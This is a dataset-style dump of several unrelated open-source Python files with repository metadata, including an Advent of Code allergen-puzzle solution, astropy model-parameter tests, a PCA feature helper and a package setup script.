__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
from . import model,wizard
| 9.333333
| 26
| 0.75
|
9b5411e2ff42b727eedb384bc37d81d8dcdfcd48
| 664
|
py
|
Python
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 22
|
2016-03-18T19:34:23.000Z
|
2021-01-03T14:32:38.000Z
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 1
|
2016-03-18T19:48:12.000Z
|
2016-03-19T20:25:11.000Z
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 18
|
2016-03-18T19:34:47.000Z
|
2020-08-06T07:47:24.000Z
|
import numpy as np
import pandas as pd
def remove_invalid_data(path):
""" Takes a path to a water pumps csv, loads in pandas, removes
invalid columns and returns the dataframe.
"""
df = pd.read_csv(path, index_col=0)
invalid_values = {
'amount_tsh': {0: np.nan},
'longitude': {0: np.nan},
'installer': {0: np.nan},
'construction_year': {0: np.nan},
}
# drop rows with invalid values
df.replace(invalid_values, inplace=True)
df.dropna(how="any", inplace=True)
return df
def gimme_the_mean(series):
if isinstance(series, float):
return series
return np.mean(series)
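if __name__ == "__main__":
    # Hypothetical usage sketch, not part of the original module: gimme_the_mean
    # passes scalars through unchanged and averages sequences.
    assert gimme_the_mean(3.5) == 3.5
    assert gimme_the_mean([1, 2, 3]) == 2.0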
| 22.133333
| 67
| 0.626506
|
9a129db8cbfa3311895dc1efa6fba4fb9f94edda
| 1,016
|
py
|
Python
|
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | 1
|
2018-12-14T18:51:29.000Z
|
2018-12-14T18:51:29.000Z
|
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | null | null | null |
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
def get_e_vec(dot, var_thres):
e_val, e_vec = np.linalg.eigh(dot)
# Descending order
idx = e_val.argsort()[::-1]
e_val = e_val[idx]
e_vec = e_vec[:, idx]
# Use only positive ones
e_val = pd.Series(e_val, index=['PC_' + str(i + 1) for i in range(e_val.shape[0])])
e_vec = pd.DataFrame(e_vec, index=dot.index, columns=e_val.index)
e_vec = e_vec.loc[:, e_val > 0]
e_val = e_val.loc[e_val > 0]
# Reduce dimension with threashold
cum_var = e_val.cumsum() / e_val.sum()
dim = cum_var.values.searchsorted(var_thres)
e_val = e_val.iloc[:dim+1]
e_vec = e_vec.iloc[:, :dim+1]
return e_val, e_vec
def orth_feats(dfX, var_thres=.95):
dfZ = dfX.sub(dfX.mean(), axis=1).div(dfX.std(), axis=1)
dot = pd.DataFrame(np.dot(dfZ.T, dfZ), index=dfX.columns, columns=dfX.columns)
e_val, e_vec = get_e_vec(dot, var_thres)
dfP = pd.DataFrame(np.dot(dfZ, e_vec), index=dfZ.index, columns=e_vec.columns)
return dfP
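if __name__ == "__main__":
    # Hypothetical sanity check, not part of the original module: features
    # orthogonalized from standardized random data should be uncorrelated.
    rng = np.random.RandomState(0)
    dfX = pd.DataFrame(rng.randn(200, 4), columns=list('abcd'))
    dfP = orth_feats(dfX, var_thres=0.95)
    off_diag = dfP.corr().abs().values - np.eye(dfP.shape[1])
    assert (off_diag < 1e-6).all()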
| 33.866667
| 87
| 0.650591
|
8eb85e64d669cc985bd58fb02c8540c7914c4e70
| 6,371
|
py
|
Python
|
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | 3
|
2020-11-16T15:20:11.000Z
|
2020-12-11T17:01:42.000Z
|
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | null | null | null |
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | 1
|
2020-12-13T04:42:44.000Z
|
2020-12-13T04:42:44.000Z
|
"""
Advent of Code: Day 21 - Allergen Assessment
--- Part 1 ---
You reach the train's last stop and the closest you can get to your vacation
island without getting wet. There aren't even any boats here, but nothing
can stop you now: you build a raft. You just need a few days' worth of food
for your journey.
You don't speak the local language, so you can't read any ingredients lists.
However, sometimes, allergens are listed in a language you do understand.
You should be able to use this information to determine which ingredient
contains which allergen and work out which foods are safe to take with you
on your trip.
You start by compiling a list of foods (your puzzle input), one food per
line. Each line includes that food's ingredients list followed by some or
all of the allergens the food contains.
Each allergen is found in exactly one ingredient. Each ingredient contains
zero or one allergen. Allergens aren't always marked; when they're listed
(as in (contains nuts, shellfish) after an ingredients list), the
ingredient that contains each listed allergen will be somewhere in the
corresponding ingredients list. However, even if an allergen isn't listed,
the ingredient that contains that allergen could still be present: maybe
they forgot to label it, or maybe it was labeled in a language you
don't know.
For example, consider the following list of foods:
mxmxvkd kfcds sqjhc nhms (contains dairy, fish)
trh fvjkl sbzzf mxmxvkd (contains dairy)
sqjhc fvjkl (contains soy)
sqjhc mxmxvkd sbzzf (contains fish)
The first food in the list has four ingredients (written in a language you
don't understand): mxmxvkd, kfcds, sqjhc, and nhms. While the food might
contain other allergens, a few allergens the food definitely contains are
listed afterward: dairy and fish.
The first step is to determine which ingredients can't possibly contain
any of the allergens in any food in your list. In the above example, none
of the ingredients kfcds, nhms, sbzzf, or trh can contain an allergen.
Counting the number of times any of these ingredients appear in any
ingredients list produces 5: they all appear once each except sbzzf, which
appears twice.
Determine which ingredients cannot possibly contain any of the allergens
in your list. How many times do any of those ingredients appear?
--- Part 2 ---
Now that you've isolated the inert ingredients, you should have enough
information to figure out which ingredient contains which allergen.
In the above example:
mxmxvkd contains dairy.
sqjhc contains fish.
fvjkl contains soy.
Arrange the ingredients alphabetically by their allergen and separate
them by commas to produce your canonical dangerous ingredient list.
(There should not be any spaces in your canonical dangerous ingredient
list.) In the above example, this would be mxmxvkd,sqjhc,fvjkl.
Time to stock your raft with supplies. What is your canonical dangerous
ingredient list?
"""
from collections import defaultdict
from functools import reduce
LOCATION = __file__
INPUT_ = open(LOCATION.replace('.py', '_input.txt')).read()
# Create a Dictionary that stores the possible ingredients that
# may contain the allergen.
POSSIBILITIES = defaultdict(list)
# Store a master list of all ingredients (for Part 1).
# Don't remove duplicate entries!
ALL_INGREDIENTS = []
# Parse the input.
for x in INPUT_.splitlines():
ingredients, allergens = x.split('(')
ingredients = ingredients.strip()
ingredients = ingredients.split(' ')
ALL_INGREDIENTS.extend(ingredients)
allergens = allergens.replace(')', '')
allergens = allergens.replace('contains', '')
allergens = allergens.split(',')
allergens = [x.strip() for x in allergens]
for a in allergens:
POSSIBILITIES[a].append(ingredients)
# For each allergen, we know the possible list of ingredients per food.
# Find the common ingredients from each food for each allergen to exclude
# ingredients that are not common to all the foods.
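# Illustration added for clarity (uses the worked example from the docstring):
# "dairy" is listed for the first two foods, so its candidate ingredients are
# the intersection of those two ingredient lists:
#   {"mxmxvkd", "kfcds", "sqjhc", "nhms"} & {"trh", "fvjkl", "sbzzf", "mxmxvkd"}
#   == {"mxmxvkd"}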
REDUCED_POSSIBILITIES = {}
for allergen, ingredients in POSSIBILITIES.items():
# Find the common set of possibilities amoung all foods.
reduced = list(reduce(lambda i, j: i & j, (set(x) for x in ingredients)))
REDUCED_POSSIBILITIES[allergen] = reduced
#print(REDUCED_POSSIBILITIES)
# Now that we have excluded all ingredients that couldn't contain
# the allergens, we know which ingredients to remove the list of
# all ingredients (for Part 1).
ALLERGENS = []
for x in REDUCED_POSSIBILITIES.values():
ALLERGENS.extend(x)
ALLERGENS = list(set(ALLERGENS))
#print(ALLERGENS)
# Remove all the allergens from the master list of ingredients.
# Count the remaining ingredient for the answer to Part 1.
for item in ALL_INGREDIENTS[:]:
if item in ALLERGENS:
ALL_INGREDIENTS.remove(item)
print(f'Part 1 Answer: {len(ALL_INGREDIENTS)}')
# --- Part 2 ---
# Now that we know the possible ingredient that each allergen could be,
# we have to use a process of elimination to match each allergen to a
# specific ingredient.
# Keep track of which allergens have been translated.
TRANSLATED = []
# Keep track of the allergen and its matched ingredient.
TRANSLATION = {}
while len(TRANSLATED) < len(REDUCED_POSSIBILITIES.keys()):
# Loop over the dictionary of allergens, if they match just
# one ingredient, remove that possibility from every other
# allergen's list of potential ingredients.
for allergen, ingredients in REDUCED_POSSIBILITIES.items():
if allergen in TRANSLATED:
continue
if len(ingredients) == 1:
match = ingredients[0]
#print(f'{allergen} translates to {match}.')
TRANSLATION[allergen] = match
            if allergen not in TRANSLATED:
                TRANSLATED.append(allergen)
for allergen, ingredients in REDUCED_POSSIBILITIES.items():
if allergen in TRANSLATED:
continue
for matched in TRANSLATION.values():
if matched in ingredients:
ingredients.remove(matched)
#print(TRANSLATED)
#print(TRANSLATION)
# To get the answer for Part 2 we have to sort the allergen
# alphabetically, then joined the translated values together.
sorted_keys = sorted(TRANSLATION.keys())
answer = ','.join([TRANSLATION[x] for x in sorted_keys])
print(f'Part 2 Answer: {answer}')
| 37.476471
| 77
| 0.740857
|
d3f626ee37d5fd4a1ebea5f8d6abba2d6a52594d
| 22,001
|
py
|
Python
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 4
|
2021-03-25T15:49:56.000Z
|
2021-12-15T09:10:04.000Z
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 20
|
2021-05-03T18:02:23.000Z
|
2022-03-12T12:01:04.000Z
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 3
|
2021-03-28T16:13:00.000Z
|
2021-07-16T10:27:25.000Z
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Tests models.parameters
"""
# pylint: disable=invalid-name
import itertools
import pytest
import numpy as np
from astropy.modeling import models, fitting
from astropy.modeling.core import Model, FittableModel
from astropy.modeling.parameters import Parameter, InputParameterError
from astropy.utils.data import get_pkg_data_filename
from . import irafutil
def setter1(val):
return val
def setter2(val, model):
model.do_something(val)
return val * model.p
class SetterModel(FittableModel):
n_inputs = 2
n_outputs = 1
xc = Parameter(default=1, setter=setter1)
yc = Parameter(default=1, setter=setter2)
def do_something(self, v):
pass
def __init__(self, xc, yc, p):
self.p = p # p is a value intended to be used by the setter
super().__init__()
self.xc = xc
self.yc = yc
def evaluate(self, x, y, xc, yc):
return (x - xc)**2 + (y - yc)**2
def do_something(self, v):
pass
class TParModel(Model):
"""
A toy model to test parameters machinery
"""
coeff = Parameter()
e = Parameter()
def __init__(self, coeff, e, **kwargs):
super().__init__(coeff=coeff, e=e, **kwargs)
@staticmethod
def evaluate(coeff, e):
pass
class MockModel(FittableModel):
alpha = Parameter(name='alpha', default=42)
@staticmethod
def evaluate(*args):
pass
def test_parameter_properties():
"""Test if getting / setting of Parameter properties works."""
p = Parameter('alpha', default=1)
assert p.name == 'alpha'
# Parameter names are immutable
with pytest.raises(AttributeError):
p.name = 'beta'
assert p.fixed is False
p.fixed = True
assert p.fixed is True
assert p.tied is False
p.tied = lambda _: 0
p.tied = False
assert p.tied is False
assert p.min is None
p.min = 42
assert p.min == 42
p.min = None
assert p.min is None
assert p.max is None
p.max = 41
assert p.max == 41
def test_parameter_operators():
"""Test if the parameter arithmetic operators work."""
par = Parameter('alpha', default=42)
num = 42.
val = 3
assert par - val == num - val
assert val - par == val - num
assert par / val == num / val
assert val / par == val / num
assert par ** val == num ** val
assert val ** par == val ** num
assert par < 45
assert par > 41
assert par <= par
assert par >= par
assert par == par
assert -par == -num
assert abs(par) == abs(num)
# Test inherited models
class M1(Model):
m1a = Parameter(default=1.)
m1b = Parameter(default=5.)
def evaluate():
pass
class M2(M1):
m2c = Parameter(default=11.)
class M3(M2):
m3d = Parameter(default=20.)
def test_parameter_inheritance():
mod = M3()
assert mod.m1a == 1.
assert mod.m1b == 5.
assert mod.m2c == 11.
assert mod.m3d == 20.
for key in ['m1a', 'm1b', 'm2c', 'm3d']:
assert key in mod.__dict__
assert mod.param_names == ('m1a', 'm1b', 'm2c', 'm3d')
def test_param_metric():
mod = M3()
assert mod._param_metrics['m1a']['slice'] == slice(0, 1)
assert mod._param_metrics['m1b']['slice'] == slice(1, 2)
assert mod._param_metrics['m2c']['slice'] == slice(2, 3)
assert mod._param_metrics['m3d']['slice'] == slice(3, 4)
mod._parameters_to_array()
assert (mod._parameters == np.array([1., 5., 11., 20], dtype=np.float64)).all()
class TestParameters:
def setup_class(self):
"""
Unit tests for parameters
Read an iraf database file created by onedspec.identify. Use the
information to create a 1D Chebyshev model and perform the same fit.
Create also a gausian model.
"""
test_file = get_pkg_data_filename('data/idcompspec.fits')
f = open(test_file)
lines = f.read()
reclist = lines.split("begin")
f.close()
record = irafutil.IdentifyRecord(reclist[1])
self.icoeff = record.coeff
order = int(record.fields['order'])
self.model = models.Chebyshev1D(order - 1)
self.gmodel = models.Gaussian1D(2, mean=3, stddev=4)
self.linear_fitter = fitting.LinearLSQFitter()
self.x = record.x
self.y = record.z
self.yy = np.array([record.z, record.z])
def test_set_parameters_as_list(self):
"""Tests updating parameters using a list."""
self.model.parameters = [30, 40, 50, 60, 70]
assert (self.model.parameters == [30., 40., 50., 60, 70]).all()
def test_set_parameters_as_array(self):
"""Tests updating parameters using an array."""
self.model.parameters = np.array([3, 4, 5, 6, 7])
assert (self.model.parameters == [3., 4., 5., 6., 7.]).all()
def test_set_as_tuple(self):
"""Tests updating parameters using a tuple."""
self.model.parameters = (1, 2, 3, 4, 5)
assert (self.model.parameters == [1, 2, 3, 4, 5]).all()
def test_set_model_attr_seq(self):
"""
Tests updating the parameters attribute when a model's
parameter (in this case coeff) is updated.
"""
self.model.parameters = [0, 0., 0., 0, 0]
self.model.c0 = 7
assert (self.model.parameters == [7, 0., 0., 0, 0]).all()
def test_set_model_attr_num(self):
"""Update the parameter list when a model's parameter is updated."""
self.gmodel.amplitude = 7
assert (self.gmodel.parameters == [7, 3, 4]).all()
def test_set_item(self):
"""Update the parameters using indexing."""
self.model.parameters = [1, 2, 3, 4, 5]
tpar = self.model.parameters
tpar[0] = 10.
self.model.parameters = tpar
assert (self.model.parameters == [10, 2, 3, 4, 5]).all()
assert self.model.c0 == 10
def test_wrong_size1(self):
"""
Tests raising an error when attempting to reset the parameters
using a list of a different size.
"""
with pytest.raises(InputParameterError):
self.model.parameters = [1, 2, 3]
def test_wrong_size2(self):
"""
Tests raising an exception when attempting to update a model's
parameter (in this case coeff) with a sequence of the wrong size.
"""
with pytest.raises(InputParameterError):
self.model.c0 = [1, 2, 3]
def test_wrong_shape(self):
"""
Tests raising an exception when attempting to update a model's
parameter and the new value has the wrong shape.
"""
with pytest.raises(InputParameterError):
self.gmodel.amplitude = [1, 2]
def test_par_against_iraf(self):
"""
Test the fitter modifies model.parameters.
Uses an iraf example.
"""
new_model = self.linear_fitter(self.model, self.x, self.y)
np.testing.assert_allclose(
new_model.parameters,
np.array([4826.1066602783685, 952.8943813407858, 12.641236013982386,
-1.7910672553339604, 0.90252884366711317]),
rtol=10 ** (-2))
def testPolynomial1D(self):
d = {'c0': 11, 'c1': 12, 'c2': 13, 'c3': 14}
p1 = models.Polynomial1D(3, **d)
np.testing.assert_equal(p1.parameters, [11, 12, 13, 14])
def test_poly1d_multiple_sets(self):
p1 = models.Polynomial1D(3, n_models=3)
np.testing.assert_equal(p1.parameters, [0.0, 0.0, 0.0, 0, 0, 0,
0, 0, 0, 0, 0, 0])
np.testing.assert_array_equal(p1.c0, [0, 0, 0])
p1.c0 = [10, 10, 10]
np.testing.assert_equal(p1.parameters, [10.0, 10.0, 10.0, 0, 0,
0, 0, 0, 0, 0, 0, 0])
def test_par_slicing(self):
"""
Test assigning to a parameter slice
"""
p1 = models.Polynomial1D(3, n_models=3)
p1.c0[:2] = [10, 10]
np.testing.assert_equal(p1.parameters, [10.0, 10.0, 0.0, 0, 0,
0, 0, 0, 0, 0, 0, 0])
def test_poly2d(self):
p2 = models.Polynomial2D(degree=3)
p2.c0_0 = 5
np.testing.assert_equal(p2.parameters, [5, 0, 0, 0, 0, 0, 0, 0, 0, 0])
def test_poly2d_multiple_sets(self):
kw = {'c0_0': [2, 3], 'c1_0': [1, 2], 'c2_0': [4, 5],
'c0_1': [1, 1], 'c0_2': [2, 2], 'c1_1': [5, 5]}
p2 = models.Polynomial2D(2, **kw)
np.testing.assert_equal(p2.parameters, [2, 3, 1, 2, 4, 5,
1, 1, 2, 2, 5, 5])
def test_shift_model_parameters1d(self):
sh1 = models.Shift(2)
sh1.offset = 3
assert sh1.offset == 3
assert sh1.offset.value == 3
def test_scale_model_parametersnd(self):
sc1 = models.Scale([2, 2])
sc1.factor = [3, 3]
assert np.all(sc1.factor == [3, 3])
np.testing.assert_array_equal(sc1.factor.value, [3, 3])
class TestMultipleParameterSets:
def setup_class(self):
self.x1 = np.arange(1, 10, .1)
self.y, self.x = np.mgrid[:10, :7]
self.x11 = np.array([self.x1, self.x1]).T
self.gmodel = models.Gaussian1D([12, 10], [3.5, 5.2], stddev=[.4, .7],
n_models=2)
def test_change_par(self):
"""
Test that a change to one parameter as a set propagates to param_sets.
"""
self.gmodel.amplitude = [1, 10]
np.testing.assert_almost_equal(
self.gmodel.param_sets,
np.array([[1.,
10],
[3.5,
5.2],
[0.4,
0.7]]))
        assert np.all(self.gmodel.parameters == [1.0, 10.0, 3.5, 5.2, 0.4, 0.7])
def test_change_par2(self):
"""
Test that a change to one single parameter in a set propagates to
param_sets.
"""
self.gmodel.amplitude[0] = 11
np.testing.assert_almost_equal(
self.gmodel.param_sets,
np.array([[11.,
10],
[3.5,
5.2],
[0.4,
0.7]]))
        assert np.all(self.gmodel.parameters == [11.0, 10.0, 3.5, 5.2, 0.4, 0.7])
def test_change_parameters(self):
self.gmodel.parameters = [13, 10, 9, 5.2, 0.4, 0.7]
np.testing.assert_almost_equal(self.gmodel.amplitude.value, [13., 10.])
np.testing.assert_almost_equal(self.gmodel.mean.value, [9., 5.2])
class TestParameterInitialization:
"""
This suite of tests checks most if not all cases if instantiating a model
with parameters of different shapes/sizes and with different numbers of
parameter sets.
"""
def test_single_model_scalar_parameters(self):
t = TParModel(10, 1)
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[10], [1]])
assert np.all(t.parameters == [10, 1])
assert t.coeff.shape == ()
assert t.e.shape == ()
def test_single_model_scalar_and_array_parameters(self):
t = TParModel(10, [1, 2])
assert len(t) == 1
assert t.model_set_axis is False
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert len(t.param_sets) == 2
assert np.all(t.param_sets[0] == [10])
assert np.all(t.param_sets[1] == [[1, 2]])
assert np.all(t.parameters == [10, 1, 2])
assert t.coeff.shape == ()
assert t.e.shape == (2,)
def test_single_model_1d_array_parameters(self):
t = TParModel([10, 20], [1, 2])
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[10, 20]], [[1, 2]]])
assert np.all(t.parameters == [10, 20, 1, 2])
assert t.coeff.shape == (2,)
assert t.e.shape == (2,)
def test_single_model_1d_array_different_length_parameters(self):
with pytest.raises(InputParameterError):
# Not broadcastable
t = TParModel([1, 2], [3, 4, 5])
def test_single_model_2d_array_parameters(self):
t = TParModel([[10, 20], [30, 40]], [[1, 2], [3, 4]])
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[[10, 20], [30, 40]]],
[[[1, 2], [3, 4]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 1, 2, 3, 4])
assert t.coeff.shape == (2, 2)
assert t.e.shape == (2, 2)
def test_single_model_2d_non_square_parameters(self):
coeff = np.array([[10, 20], [30, 40], [50, 60]])
e = np.array([[1, 2], [3, 4], [5, 6]])
t = TParModel(coeff, e)
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[[10, 20], [30, 40], [50, 60]]],
[[[1, 2], [3, 4], [5, 6]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60,
1, 2, 3, 4, 5, 6])
assert t.coeff.shape == (3, 2)
assert t.e.shape == (3, 2)
t2 = TParModel(coeff.T, e.T)
assert len(t2) == 1
assert t2.model_set_axis is False
assert np.all(t2.param_sets == [[[[10, 30, 50], [20, 40, 60]]],
[[[1, 3, 5], [2, 4, 6]]]])
assert np.all(t2.parameters == [10, 30, 50, 20, 40, 60,
1, 3, 5, 2, 4, 6])
assert t2.coeff.shape == (2, 3)
assert t2.e.shape == (2, 3)
# Not broadcastable
with pytest.raises(InputParameterError):
TParModel(coeff, e.T)
with pytest.raises(InputParameterError):
TParModel(coeff.T, e)
def test_single_model_2d_broadcastable_parameters(self):
t = TParModel([[10, 20, 30], [40, 50, 60]], [1, 2, 3])
assert len(t) == 1
assert t.model_set_axis is False
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 20, 30], [40, 50, 60]]])
assert np.all(t.param_sets[1] == [[1, 2, 3]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 1, 2, 3])
@pytest.mark.parametrize(('p1', 'p2'), [
(1, 2), (1, [2, 3]), ([1, 2], 3), ([1, 2, 3], [4, 5]),
([1, 2], [3, 4, 5])])
def test_two_model_incorrect_scalar_parameters(self, p1, p2):
with pytest.raises(InputParameterError):
TParModel(p1, p2, n_models=2)
@pytest.mark.parametrize('kwargs', [
{'n_models': 2}, {'model_set_axis': 0},
{'n_models': 2, 'model_set_axis': 0}])
def test_two_model_scalar_parameters(self, kwargs):
t = TParModel([10, 20], [1, 2], **kwargs)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[10, 20], [1, 2]])
assert np.all(t.parameters == [10, 20, 1, 2])
assert t.coeff.shape == (2,)
assert t.e.shape == (2,)
@pytest.mark.parametrize('kwargs', [
{'n_models': 2}, {'model_set_axis': 0},
{'n_models': 2, 'model_set_axis': 0}])
def test_two_model_scalar_and_array_parameters(self, kwargs):
t = TParModel([10, 20], [[1, 2], [3, 4]], **kwargs)
assert len(t) == 2
assert t.model_set_axis == 0
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[10], [20]])
assert np.all(t.param_sets[1] == [[1, 2], [3, 4]])
assert np.all(t.parameters == [10, 20, 1, 2, 3, 4])
assert t.coeff.shape == (2,)
assert t.e.shape == (2, 2)
def test_two_model_1d_array_parameters(self):
t = TParModel([[10, 20], [30, 40]], [[1, 2], [3, 4]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[[10, 20], [30, 40]],
[[1, 2], [3, 4]]])
assert np.all(t.parameters == [10, 20, 30, 40, 1, 2, 3, 4])
assert t.coeff.shape == (2, 2)
assert t.e.shape == (2, 2)
t2 = TParModel([[10, 20, 30], [40, 50, 60]],
[[1, 2, 3], [4, 5, 6]], n_models=2)
assert len(t2) == 2
assert t2.model_set_axis == 0
assert np.all(t2.param_sets == [[[10, 20, 30], [40, 50, 60]],
[[1, 2, 3], [4, 5, 6]]])
assert np.all(t2.parameters == [10, 20, 30, 40, 50, 60,
1, 2, 3, 4, 5, 6])
assert t2.coeff.shape == (2, 3)
assert t2.e.shape == (2, 3)
def test_two_model_mixed_dimension_array_parameters(self):
with pytest.raises(InputParameterError):
# Can't broadcast different array shapes
TParModel([[[1, 2], [3, 4]], [[5, 6], [7, 8]]],
[[9, 10, 11], [12, 13, 14]], n_models=2)
t = TParModel([[[10, 20], [30, 40]], [[50, 60], [70, 80]]],
[[1, 2], [3, 4]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 20], [30, 40]],
[[50, 60], [70, 80]]])
assert np.all(t.param_sets[1] == [[[1, 2]], [[3, 4]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 70, 80,
1, 2, 3, 4])
assert t.coeff.shape == (2, 2, 2)
assert t.e.shape == (2, 2)
def test_two_model_2d_array_parameters(self):
t = TParModel([[[10, 20], [30, 40]], [[50, 60], [70, 80]]],
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[[[10, 20], [30, 40]],
[[50, 60], [70, 80]]],
[[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 70, 80,
1, 2, 3, 4, 5, 6, 7, 8])
assert t.coeff.shape == (2, 2, 2)
assert t.e.shape == (2, 2, 2)
def test_two_model_nonzero_model_set_axis(self):
# An example where the model set axis is the *last* axis of the
# parameter arrays
coeff = np.array([[[10, 20, 30], [30, 40, 50]], [[50, 60, 70], [70, 80, 90]]])
coeff = np.rollaxis(coeff, 0, 3)
e = np.array([[1, 2, 3], [3, 4, 5]])
e = np.rollaxis(e, 0, 2)
t = TParModel(coeff, e, n_models=2, model_set_axis=-1)
assert len(t) == 2
assert t.model_set_axis == -1
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 50], [20, 60], [30, 70]],
[[30, 70], [40, 80], [50, 90]]])
assert np.all(t.param_sets[1] == [[[1, 3], [2, 4], [3, 5]]])
assert np.all(t.parameters == [10, 50, 20, 60, 30, 70, 30, 70, 40, 80,
50, 90, 1, 3, 2, 4, 3, 5])
        assert t.coeff.shape == (2, 3, 2)  # model axis is last because model_set_axis=-1
        assert t.e.shape == (3, 2)  # model axis is last because model_set_axis=-1
def test_wrong_number_of_params(self):
with pytest.raises(InputParameterError):
TParModel(coeff=[[1, 2], [3, 4]], e=(2, 3, 4), n_models=2)
with pytest.raises(InputParameterError):
TParModel(coeff=[[1, 2], [3, 4]], e=(2, 3, 4), model_set_axis=0)
    def test_wrong_number_of_params2(self):
        with pytest.raises(InputParameterError):
            TParModel(coeff=[[1, 2], [3, 4]], e=4, n_models=2)
        with pytest.raises(InputParameterError):
            TParModel(coeff=[[1, 2], [3, 4]], e=4, model_set_axis=0)
    def test_array_parameter1(self):
        with pytest.raises(InputParameterError):
            TParModel(np.array([[1, 2], [3, 4]]), 1, model_set_axis=0)
    def test_array_parameter2(self):
        with pytest.raises(InputParameterError):
            TParModel(np.array([[1, 2], [3, 4]]), (1, 1, 11),
                      model_set_axis=0)
def test_array_parameter4(self):
"""
Test multiple parameter model with array-valued parameters of the same
size as the number of parameter sets.
"""
t4 = TParModel([[1, 2], [3, 4]], [5, 6], model_set_axis=False)
assert len(t4) == 1
assert t4.coeff.shape == (2, 2)
assert t4.e.shape == (2,)
assert np.issubdtype(t4.param_sets.dtype, np.object_)
assert np.all(t4.param_sets[0] == [[1, 2], [3, 4]])
assert np.all(t4.param_sets[1] == [5, 6])
def test_non_broadcasting_parameters():
"""
Tests that in a model with 3 parameters that do not all mutually broadcast,
this is determined correctly regardless of what order the parameters are
in.
"""
a = 3
b = np.array([[1, 2, 3], [4, 5, 6]])
c = np.array([[1, 2, 3, 4], [1, 2, 3, 4]])
class TestModel(Model):
p1 = Parameter()
p2 = Parameter()
p3 = Parameter()
def evaluate(self, *args):
return
# a broadcasts with both b and c, but b does not broadcast with c
for args in itertools.permutations((a, b, c)):
with pytest.raises(InputParameterError):
TestModel(*args)
def test_setter():
pars = np.random.rand(20).reshape((10, 2))
model = SetterModel(xc=-1, yc=3, p=np.pi)
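    # With xc=-1, yc=3 and p=pi the model is expected to evaluate to
    # (x - xc)**2 + (y - p*yc)**2, i.e. (x + 1)**2 + (y - 3*pi)**2,
    # which is what the assertion below verifies.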
for x, y in pars:
np.testing.assert_almost_equal(
model(x, y),
(x + 1)**2 + (y - np.pi * 3)**2)
| 34.004637
| 86
| 0.534703
|
26c2ef38f291c70bc50935053ca012609ea81e03
| 748
|
py
|
Python
|
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import setuptools
setuptools.setup(
name='duffy',
description='',
version='2.0.2',
packages=setuptools.find_packages(),
include_package_data=True,
license='Apache 2.0',
install_requires=[
'beanstalkc',
'flask',
'flask-marshmallow',
'flask-migrate',
'flask-sqlalchemy',
'marshmallow-sqlalchemy',
'marshmallow==3.0.0b6',
'pymysql',
'paramiko',
],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Utilities",
],
scripts=[],
)
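# A typical way to install this package for local development (assumed
# workflow): pip install -e .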
| 22
| 61
| 0.550802
|
